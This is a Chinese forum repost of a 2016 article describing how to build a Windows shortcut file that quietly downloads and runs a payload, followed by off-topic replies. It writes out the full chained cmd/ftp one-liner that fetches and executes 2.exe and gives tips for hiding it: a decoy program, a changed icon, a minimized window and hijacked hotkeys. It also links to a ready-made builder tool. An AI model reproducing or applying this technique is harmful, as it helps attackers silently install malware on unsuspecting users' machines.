技术控

    今日:0| 主题:63445
收藏本版 (1)
最新软件应用技术尽在掌握

[其他] Windows小工具:LnkDown快捷方式加载Payload

[复制链接]
伪娘 发表于 2016-10-6 06:40:38
355 6
前言

  投稿一次,被小编退了,原因是不够扯。我就是小学没毕业的小学生,你让我扯,我去哪跟你扯的天花乱坠啊,使出洪荒之力我就再扯一次吧。还是要感谢下FREEBUF上次的小礼物,灰常喜欢。
  之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的,也就是说在默认未装载的PC上就然并卵了。
  

Windows小工具:LnkDown快捷方式加载Payload

Windows小工具:LnkDown快捷方式加载Payload

  快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢?聪明的你想到cmd多命令执行了吗?whoami&&netuser??至于下载文件,既然可以cmd多命令执行了,当然可以利用ftp下载文件了,有了思路就动手吧!
  基本思路

  逻辑

  1. Echo写出ftp信息,使用ftp –s:x 参数运行下载命令
  2. 语句使用&&链接,语句被执行才会继续下一步操作
  3. 最后执行恶意程序时使用if exist判断恶意程序是否下载,如果下载则执行
  

Windows小工具:LnkDown快捷方式加载Payload

Windows小工具:LnkDown快捷方式加载Payload

  思路验证

  1. echo open127.0.0.1>f&&echo 123>>f&&echo321>>f&&echo get 2.exe>>f&&echobye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe
复制代码
CMD下运行正常,但写到快捷方式,显然需要修改一下,首先必须加入/c执行,否则会卡出黑屏不退出(这么不尊重被攻击者,脑子是不是被踢了),在下载前运行一个正常的程序,免的被发现,例如calc.exe&&下载运行命令,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。
  

Windows小工具:LnkDown快捷方式加载Payload

Windows小工具:LnkDown快捷方式加载Payload

  奇技淫巧

  如果你右键查看,细心的朋友已经注意到有一个快捷键的选项,快捷方式的快捷方式,他是个无公害的功能,如果被恶意替换冲突某些程序的快捷方式呢?例如QQ的Ctrl+Alt+A截屏快捷键,毕竟是失传已久的“隔空怀孕”,难免有射不准的时候,多测试几次找找规律!
  

Windows小工具:LnkDown快捷方式加载Payload

Windows小工具:LnkDown快捷方式加载Payload

  自动工具

  每次创建都尼玛要写一长串cmd命令,就算不烦也难免写出的时候啊,结合上面的实验写了一个小工具,纯属方便用的,附上小工具:LnkDown.exe
   链接: https://pan.baidu.com/s/1mie0mko 密码: 5dxi
  防御:远离黑客,珍爱生命!
   *原创作者:键盘手,转载请注明来自FreeBuf(FreeBuf.COM)
崔菁 发表于 2016-10-6 11:25:51
不明觉厉,先回再看!
回复 支持 反对

使用道具 举报

yxlamkiv 发表于 2016-11-16 13:16:08
永远不要给背叛过自己的朋友第二次背叛的机会。
回复 支持 反对

使用道具 举报

空心印 发表于 2016-11-16 17:22:49
前排支持下!
回复 支持 反对

使用道具 举报

一菇凉心凉 发表于 2016-11-16 19:00:57
男人嘴巴眯眯甜心都一把苣苣莲!
回复 支持 反对

使用道具 举报

阳光透过窗台 发表于 2016-11-19 20:25:27
大声告诉我这是几楼?
回复 支持 反对

使用道具 举报

邓李 发表于 2016-11-20 17:53:07
今日头条 伪娘被曝
回复 支持 反对

使用道具 举报

我要投稿

推荐阅读


回页顶回复上一篇下一篇回列表
手机版/c.CoLaBug.com ( 粤ICP备05003221号 | 粤公网安备 44010402000842号 )

© 2001-2017 Comsenz Inc.

返回顶部 返回列表